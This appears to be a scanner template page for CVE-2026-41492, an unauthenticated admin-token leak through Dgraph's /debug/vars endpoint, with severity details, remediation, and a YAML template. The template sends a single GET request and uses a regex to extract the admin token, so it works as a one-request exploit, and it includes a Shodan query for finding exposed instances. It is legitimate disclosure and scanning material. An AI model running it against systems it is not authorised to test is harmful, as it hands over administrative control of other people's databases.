Dgraph <= 25.3.2 - Admin Token Disclosure
CVE-2026-41492
Verified
Description
Dgraph <= 25.3.2 contains an information disclosure caused by unauthenticated access to the /debug/vars endpoint , which publishes the cmdline variable including the --security token= flag, letting unauthenticated remote attackers retrieve the admin token and access admin-only endpoints, exploit requires no authentication.
Severity
Critical
CVSS Score
9.8
Exploit Probability
2%
Affected Product
dgraph
Published Date
April 29, 2026
Template Author
divine balija
CVE-2026-41492.yaml
id: CVE-2026-41492
info:
name: Dgraph <= 25.3.2 - Admin Token Disclosure
author: Divine Balija
severity: critical
description: |
Dgraph <= 25.3.2 contains an information disclosure caused by unauthenticated access to the /debug/vars endpoint , which publishes the cmdline variable including the --security token= flag, letting unauthenticated remote attackers retrieve the admin token and access admin-only endpoints, exploit requires no authentication.
impact: |
Unauthenticated attackers can retrieve the admin token and gain full administrative control over the Dgraph instance.
remediation: |
Update to Dgraph version 25.3.3 or later.
reference:
- https://github.com/dgraph-io/dgraph/security/advisories/GHSA-vvf7-6rmr-m29q
- https://nvd.nist.gov/vuln/detail/CVE-2026-41492
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-41492
epss-score: 0.02187
epss-percentile: 0.80235
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
vendor: dgraph
product: dgraph
shodan-query: "Dgraph"
tags: cve,cve2026,dgraph,exposure,token
http:
- method: GET
path:
- "{{BaseURL}}/debug/vars"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "cmdline"
- "token="
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'token=([^"\\]+)'
# digest: 4b0a00483046022100acf1dcdeb69a59743404d8504f09ea1e9c3160e758933a6350f0ed31db04f9b7022100d0894787763362e8168d719e12de0505006dbaac8dbb73a4323ff418ae43f574:922c64590222798bb761d5b6d8e729509.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-41492
CWE ID:
cwe-200
Remediation Steps
Update to Dgraph version 25.3.3 or later.